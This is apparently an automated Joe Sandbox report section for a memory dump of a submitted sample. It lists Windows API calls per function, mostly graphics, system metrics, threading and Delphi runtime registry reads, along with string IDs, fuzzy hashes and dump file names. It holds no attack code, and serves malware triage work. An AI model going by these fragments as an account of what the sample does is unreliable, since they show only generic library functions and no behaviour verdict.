                                                                                                                                  Strings
                                                                                                                                  • KbdLayerDescriptor, xrefs: 042130B8
                                                                                                                                  • Layout File, xrefs: 0421308D
                                                                                                                                  • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 04213075
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                                                                                                                  • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
                                                                                                                                  • API String ID: 3365787578-2194312379
                                                                                                                                  • Opcode ID: ebc781996fc85c6c72d49e2a4b1c4689d1efd4746f69a9eafa970c265c40328b
                                                                                                                                  • Instruction ID: 5bad3e7d3474b630288de2ca35f7a0616dab39ea13379ec921051bfdc2e44a44
                                                                                                                                  • Opcode Fuzzy Hash: ebc781996fc85c6c72d49e2a4b1c4689d1efd4746f69a9eafa970c265c40328b
                                                                                                                                  • Instruction Fuzzy Hash: 0D21A174F10649AFFF01EFA5D8919AEBBFAFB49304F418464E810A7650DB39B941CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0420B0FC
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0420B111
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0420B11C
                                                                                                                                  • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0420B146
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfoA
                                                                                                                                  • API String ID: 2545840971-1370492664
                                                                                                                                  • Opcode ID: aab60616642a426f534bb9479afd783ac48a2770f36875d74648a2ee6f8f1ad1
                                                                                                                                  • Instruction ID: 01dbee1bf26ac9088cf5c38acb02a4616c57fda3080916902de2cd68b2fd1eed
                                                                                                                                  • Opcode Fuzzy Hash: aab60616642a426f534bb9479afd783ac48a2770f36875d74648a2ee6f8f1ad1
                                                                                                                                  • Instruction Fuzzy Hash: 2B11D631B107159FE730CFA8AC887ABFBE9EB05761F008529ED5597281D3B4B844CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0420B1D0
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0420B1E5
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0420B1F0
                                                                                                                                  • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0420B21A
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfoW
                                                                                                                                  • API String ID: 2545840971-2774842281
                                                                                                                                  • Opcode ID: c7aa6fcb9c59fb0474afcf16bd34d2cddc1264bb0efb2d50b0b9d66a3351442c
                                                                                                                                  • Instruction ID: e6a7a918d463eb5247d0577beea606e82eee3d987fddb89b6964e9a116f101bf
                                                                                                                                  • Opcode Fuzzy Hash: c7aa6fcb9c59fb0474afcf16bd34d2cddc1264bb0efb2d50b0b9d66a3351442c
                                                                                                                                  • Instruction Fuzzy Hash: A9117531B117116FD730DFA9A844B7BBBE9EB05761F008529ED55E7281D774B804CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 04203C9C: GetObjectA.GDI32(?,00000004), ref: 04203CB3
                                                                                                                                    • Part of subcall function 04203C9C: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 04203CD6
                                                                                                                                  • GetDC.USER32(00000000), ref: 04204EB2
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 04204EBE
                                                                                                                                  • SelectObject.GDI32(?), ref: 04204ECB
                                                                                                                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,04204F23,?,?,?,?,00000000), ref: 04204EEF
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 04204F09
                                                                                                                                  • DeleteDC.GDI32(?), ref: 04204F12
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 04204F1D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4046155103-0
                                                                                                                                  • Opcode ID: 8ae3c00dcd804de0e0e0891d890c0c8737fd3250cb0001d8aeb557dbe9386622
                                                                                                                                  • Instruction ID: ce3c773e74867ce570d3d9c1b1726458c0ca10de61aa59aa85ee36a5f1b46942
                                                                                                                                  • Opcode Fuzzy Hash: 8ae3c00dcd804de0e0e0891d890c0c8737fd3250cb0001d8aeb557dbe9386622
                                                                                                                                  • Instruction Fuzzy Hash: C0112475E146096BEB10EBE5CC95AADB3FCEB08704F8084A5BA04D7281D775B9408B90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCursorPos.USER32 ref: 04231CA3
                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 04231CB0
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 04231CBE
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04231CC5
                                                                                                                                  • SendMessageA.USER32(00000000,00000084,00000000,?), ref: 04231CEE
                                                                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,?), ref: 04231D00
                                                                                                                                  • SetCursor.USER32(00000000), ref: 04231D12
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1770779139-0
                                                                                                                                  • Opcode ID: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                                                  • Instruction ID: 1d38d688fcb98c370715d2efbb04658ab092d599cf3903b384d6d595082522c4
                                                                                                                                  • Opcode Fuzzy Hash: 0301ce3d54c7204a7a6b5ca268c7210a4c05c4d30679fed311c8ecdd25f56cd2
                                                                                                                                  • Instruction Fuzzy Hash: 9201F56931474175E7212B658CC0F3F76B8DFC6A4AF144429F988DA191E725FC119326
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041EBE3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 041EBE59
                                                                                                                                    • Part of subcall function 041EBE3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 041EBE7D
                                                                                                                                    • Part of subcall function 041EBE3C: GetModuleFileNameA.KERNEL32(041E0000,?,00000105), ref: 041EBE98
                                                                                                                                    • Part of subcall function 041EBE3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 041EBF2E
                                                                                                                                  • CharToOemA.USER32(?,?), ref: 041EBFFB
                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 041EC018
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 041EC01E
                                                                                                                                  • GetStdHandle.KERNEL32(000000F4,041EC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 041EC033
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F4,041EC088,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 041EC039
                                                                                                                                  • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 041EC05B
                                                                                                                                  • MessageBoxA.USER32(00000000,?,?,00002010), ref: 041EC071
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 185507032-0
                                                                                                                                  • Opcode ID: 43e880089ededfa721c475cf6228150d7a404532ce8e410a8a522033e2abd1a3
                                                                                                                                  • Instruction ID: 74b5775a19733adb80d724ff04360f0a1ba36e528da3aac2f09984a0a7ef3935
                                                                                                                                  • Opcode Fuzzy Hash: 43e880089ededfa721c475cf6228150d7a404532ce8e410a8a522033e2abd1a3
                                                                                                                                  • Instruction Fuzzy Hash: 211188BA204B04AAE200FBA9CCC5FAFB7ACAB41714F804515B754E70D1EB35F9048B66
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • FillRect.USER32(?,?), ref: 0422CAE5
                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0422CB10
                                                                                                                                  • FillRect.USER32(?,?,00000000), ref: 0422CB2F
                                                                                                                                    • Part of subcall function 0422C9E0: CallWindowProcA.USER32(?,?,?,?,?), ref: 0422CA1A
                                                                                                                                  • BeginPaint.USER32(?,?), ref: 0422CBA7
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0422CBD4
                                                                                                                                  • EndPaint.USER32(?,?,0422CC48), ref: 0422CC34
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$FillPaintWindow$BeginCallClientProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 901200654-0
                                                                                                                                  • Opcode ID: 74f4d71286f957ec2e7540bfcae7cd6315dec1e2f73de897d34cf6176991fe3c
                                                                                                                                  • Instruction ID: 7974b005580dd958d54cbc989b68f0542236b2930dd245dff9f5fdb8bc78f45f
                                                                                                                                  • Opcode Fuzzy Hash: 74f4d71286f957ec2e7540bfcae7cd6315dec1e2f73de897d34cf6176991fe3c
                                                                                                                                  • Instruction Fuzzy Hash: 1351E375A24219EFDB10DFA9C688A9DB7F8AF09314F6481A5E808EB251D734BE45CF00
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 041EF991
                                                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 041EF9AD
                                                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 041EF9E6
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 041EFA63
                                                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 041EFA7C
                                                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 041EFAB1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 351091851-0
                                                                                                                                  • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                  • Instruction ID: f34e38139d1ea3a5b6f967a70c24b0cb95d8cb7e09c26a7b44cf51a2ea458030
                                                                                                                                  • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                  • Instruction Fuzzy Hash: 36510D79900A29ABDB26DF59C8D0BE9B3FCAF48204F0441D5EA49E7205D770AF85CF61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 041FD6EF
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 041FD6FE
                                                                                                                                    • Part of subcall function 041FD6BC: ResetEvent.KERNEL32(00000350,041FD739), ref: 041FD6C2
                                                                                                                                  • EnterCriticalSection.KERNEL32(0427A2EC), ref: 041FD743
                                                                                                                                  • InterlockedExchange.KERNEL32(0424AAF0,?), ref: 041FD75F
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0427A2EC,00000000,041FD88A,?,00000000,041FD8A9,?,0427A2EC), ref: 041FD7B8
                                                                                                                                  • EnterCriticalSection.KERNEL32(0427A2EC,041FD834,041FD88A,?,00000000,041FD8A9,?,0427A2EC), ref: 041FD827
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2189153385-0
                                                                                                                                  • Opcode ID: 8cba3ce124ca50fd14f730bd87bca74950c83f8908bb3d6bf4ac805975ab0cd6
                                                                                                                                  • Instruction ID: 8413888fcad3bbcf00965b7ca9973319cbb29c98e31a219efea181ce9ff9abaa
                                                                                                                                  • Opcode Fuzzy Hash: 8cba3ce124ca50fd14f730bd87bca74950c83f8908bb3d6bf4ac805975ab0cd6
                                                                                                                                  • Instruction Fuzzy Hash: E531DF34B04A44AFE711DBA9ECD1A3DB7B8EB49718F9184B4E602D7650D7757802CA21
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMetrics.USER32(0000000B), ref: 04203F9A
                                                                                                                                  • GetSystemMetrics.USER32(0000000C), ref: 04203FA6
                                                                                                                                  • GetDC.USER32(00000000), ref: 04203FC2
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 04203FE9
                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 04203FF6
                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0420402F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CapsDeviceMetricsSystem$Release
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 447804332-0
                                                                                                                                  • Opcode ID: b0350fc835d232db7d32873b9bfebd4bf7d51237ebfd753221e91d97aca7303b
                                                                                                                                  • Instruction ID: 8c79b2f6754d04253345ed02fe92d993ccb373d3b716ef491150333cf373361f
                                                                                                                                  • Opcode Fuzzy Hash: b0350fc835d232db7d32873b9bfebd4bf7d51237ebfd753221e91d97aca7303b
                                                                                                                                  • Instruction Fuzzy Hash: 95318E74B00605EFEB04EFA5C880AAEBBF5FB49310F40C565E914AB391D771A941CF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 04204258: GetObjectA.GDI32(?,00000054), ref: 0420426C
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 042043CE
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 042043EF
                                                                                                                                  • RealizePalette.GDI32(?), ref: 042043FB
                                                                                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 04204412
                                                                                                                                  • SelectPalette.GDI32(?,00000000,00000000), ref: 0420443A
                                                                                                                                  • DeleteDC.GDI32(?), ref: 04204443
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1221726059-0
                                                                                                                                  • Opcode ID: 23534879c587e4e8f2208b940738903db02da58dc175d91bfc7221159ac7cbbc
                                                                                                                                  • Instruction ID: cf9b2b27a42acd4fe249102d3038f204d722b22df7ee5f8d210494b4139ebf38
                                                                                                                                  • Opcode Fuzzy Hash: 23534879c587e4e8f2208b940738903db02da58dc175d91bfc7221159ac7cbbc
                                                                                                                                  • Instruction Fuzzy Hash: DE110D79F146047BEB11EBA9CC81FAEB7FCEB48614F91C464B614E7281D674F9008B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 04203C11
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 04203C1A
                                                                                                                                  • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,04206197,?,?,?,?,04204D0F), ref: 04203C2E
                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 04203C3A
                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 04203C40
                                                                                                                                  • CreatePalette.GDI32 ref: 04203C87
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2515223848-0
                                                                                                                                  • Opcode ID: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
                                                                                                                                  • Instruction ID: d7d67c2e01171ade6d9c34586337f6edd0ef9a3cea35787eea9f4b586ae20a3a
                                                                                                                                  • Opcode Fuzzy Hash: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
                                                                                                                                  • Instruction Fuzzy Hash: 7F01926571471066F714F72B8C82B7B72F89FC0718F84C829B989C72C2E779E8458356
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 04202AA8: CreateBrushIndirect.GDI32(?), ref: 04202B53
                                                                                                                                  • UnrealizeObject.GDI32(00000000), ref: 042032EC
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 042032FE
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 04203321
                                                                                                                                  • SetBkMode.GDI32(?,00000002), ref: 0420332C
                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 04203347
                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 04203352
                                                                                                                                    • Part of subcall function 04201CEC: GetSysColor.USER32(?), ref: 04201CF6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3527656728-0
                                                                                                                                  • Opcode ID: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
                                                                                                                                  • Instruction ID: 282d14dbcc9c7ff8b1096d54ec5afdb6eeaafd61954e9ba70838e222366bd969
                                                                                                                                  • Opcode Fuzzy Hash: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
                                                                                                                                  • Instruction Fuzzy Hash: F7F066A97105009BEB10FFA9D9C9A1B67E8AF142197848491B948DF297CF65FC508731
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041E36F2
                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,041E3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041E3725
                                                                                                                                  • RegCloseKey.ADVAPI32(?,041E3748,00000000,?,00000004,00000000,041E3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041E373B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                  • API String ID: 3677997916-4173385793
                                                                                                                                  • Opcode ID: 1ec38852936540009816dd8f815700b7dcdf351b676c206c6c3c3d4adb26e7f9
                                                                                                                                  • Instruction ID: 999711cb726afc2e7753e05c77487869a1c840af5cb5e1a6f32751bf41ae90ad
                                                                                                                                  • Opcode Fuzzy Hash: 1ec38852936540009816dd8f815700b7dcdf351b676c206c6c3c3d4adb26e7f9
